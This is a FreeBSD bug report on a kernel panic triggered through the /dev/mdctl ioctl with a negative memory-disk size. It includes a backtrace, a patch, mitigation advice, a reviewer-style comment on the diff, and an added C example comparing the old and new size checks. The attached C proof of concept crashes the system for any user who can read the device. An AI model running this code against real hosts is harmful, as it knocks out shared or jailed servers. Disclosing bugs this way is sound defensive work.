Date: Tue, 17 Jul 2012 17:50:25 GMT
From: Filip Palian <filip.palian@pjwstk.edu.pl>
To: freebsd-gnats-submit@FreeBSD.org
Subject: misc/169947: System crash via ioctl() on mdctl.
Message-ID: <201207171750.q6HHoPQ2098957@red.freebsd.org>
Resent-Message-ID: <201207171800.q6HI0Mws064833@freefall.freebsd.org>
>Number: 169947
>Category: misc
>Synopsis: System crash via ioctl() on mdctl.
>Confidential: no
>Severity: non-critical
>Priority: low
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Tue Jul 17 18:00:22 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Filip Palian
>Release: FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
A user who has read permission on "/dev/mdctl" is able to crash the system (also from within a jail, if the device is provided via devfs(.rules)) via the ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occurs in function swap_release_by_cred() (swap_pager.c:285) called from vm_object_deallocate() (md.c:1119). Some detailed information is included below.
-- cut --
fbsd dumped core - see /var/crash/vmcore.0
.
panic: swap_reserved < decr
.
Unread portion of the kernel message buffer:
panic: swap_reserved < decr
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b1d7 at kdb_backtrace+0x47
#1 0xc0a18737 at panic+0x117
#2 0xc0c6d147 at swap_release_by_cred+0x97 <--- panicked here
#3 0xc0c85684 at vm_object_destroy+0xd4
#4 0xc0c87825 at vm_object_terminate+0x2c5
#5 0xc0c880a7 at vm_object_deallocate+0x877
#6 0xc0c7da51 at vm_map_entry_deallocate+0x21
#7 0xc0c7daba at vm_map_process_deferred+0x2a
#8 0xc0c7ebfa at _vm_map_unlock+0x4a
#9 0xc0c7f2eb at vm_map_remove+0x6b
#10 0xc0c82543 at vmspace_exit+0xc3
#11 0xc09e9038 at exit1+0x6f8
#12 0xc09e9d7d at sys_sys_exit+0x1d
#13 0xc0d4c275 at syscall+0x355
#14 0xc0d35a51 at Xint0x80_syscall+0x21
Uptime: 2h36m43s
Physical memory: 1383 MB
Dumping 80 MB: 65 49 33 17 1
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
The "mediasize" member of the "md_s" structure should be of an unsigned type. Currently it is of type off_t, which is "typedef long __int64_t".
An alternative solution would be to add the following sanity condition at md.c:1091 (not to mention the author's own comment):
-- cut --
--- dev/md/md.c.old 2012-07-15 21:32:40.000000000 +0200
+++ dev/md/md.c 2012-07-15 21:30:00.000000000 +0200
@@ -1088,7 +1088,7 @@ mdcreate_swap(struct md_s *sc, struct md
* Range check. Disallow negative sizes or any size less then the
* size of a page. Then round to a page.
*/
- if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0)
+ if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)
return (EDOM);
/*
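Review bot: the file headers have the `-` side (md.c.old, 21:32:40) timestamped later than the `+` side (md.c, 21:30:00), so the diff looks reversed or taken from swapped copies; regenerate it with the old file first so that `+ if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0)` is unambiguously the proposed line. The check itself is the right one: with the previous `== 0` test, a negative size that happens to be an exact multiple of PAGE_SIZE has a zero remainder and passes, which contradicts the "Disallow negative sizes" comment directly above it. Since that comment is being touched, "less then" should read "less than".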
-- cut --
To prevent evil users from doing bad things, administrators should ensure that "/dev/mdctl" permissions are +rw (600) for root only.
For servers where jails are provided to untrusted users (e.g. hosting companies), access to the "/dev/mdctl" device should be forbidden/hidden using devfs.rules.
Patch attached with submission follows:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>
#include <sys/mman.h>

int main(void)
{
	int f;
	void *p;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	// s.md_type = MD_SWAP;
	s.md_type = MD_PRELOAD;
	s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS;
	// typedef long long = int64 = off_t
	// s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000;
	s.md_mediasize = -1000000000000;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit(0);
	}
	f = open("/dev/mdctl", O_RDONLY, 0);
	printf("say goodnight...\n");
	if (ioctl(f, MDIOCATTACH, &s) < 0)
		printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
	printf("no +r no fun\n");
	exit(0);
}
>Release-Note:
>Audit-Trail:
>Unformatted:
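The two range checks from the patch hunk, side by side on the report's own size value, as an added example; this is not the report's code or FreeBSD's md.c, and it assumes PAGE_SIZE is 4096 (the i386 value) and uses int64_t in place of the signed off_t the report describes.

```c
/*
 * Added example, not code from the bug report or from FreeBSD's md.c.
 * It lifts the two range checks from the patch hunk into user-space
 * functions so the difference can be run on sample sizes offline.
 * Assumptions: PAGE_SIZE is 4096 (the i386 value), and int64_t stands in
 * for the signed off_t the report describes.
 */
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>
#include <errno.h>

typedef int64_t md_off_t;       /* stand-in for off_t: signed, 64-bit */
#define MD_PAGE_SIZE 4096       /* assumed PAGE_SIZE */

/* Check as it was before the patch: rejects only 0 and non-page-multiples. */
int md_check_size_old(md_off_t mediasize)
{
	if (mediasize == 0 || (mediasize % MD_PAGE_SIZE) != 0)
		return EDOM;
	return 0;
}

/* Check as proposed in the patch: rejects everything <= 0 before the modulo. */
int md_check_size_new(md_off_t mediasize)
{
	if (mediasize <= 0 || (mediasize % MD_PAGE_SIZE) != 0)
		return EDOM;
	return 0;
}

/* Page count the size would be converted to; a negative result is what a
 * downstream consumer would be handed if the old check let the size in. */
md_off_t md_pages_for(md_off_t mediasize)
{
	return mediasize / MD_PAGE_SIZE;
}

int main(void)
{
	/* Constructed sample sizes: the report's value, zero, one page,
	 * a non-multiple, and a negative exact multiple of the page size. */
	const md_off_t samples[] = { -1000000000000LL, 0, 4096, 4097, -4096 };
	size_t i;

	for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
		md_off_t sz = samples[i];
		printf("%16" PRId64 "  old:%-5s new:%-5s pages:%" PRId64 "\n",
		    sz,
		    md_check_size_old(sz) == 0 ? "pass" : "EDOM",
		    md_check_size_new(sz) == 0 ? "pass" : "EDOM",
		    md_pages_for(sz));
	}
	return 0;
}
```

10^12 is 2^12 * 5^12, so the report's -1000000000000 is an exact multiple of 4096: its remainder is 0, the old check passes it, and the size turns into a negative page count of -244140625 downstream. The `<= 0` test short-circuits before the modulo and returns EDOM for it, as it does for -4096.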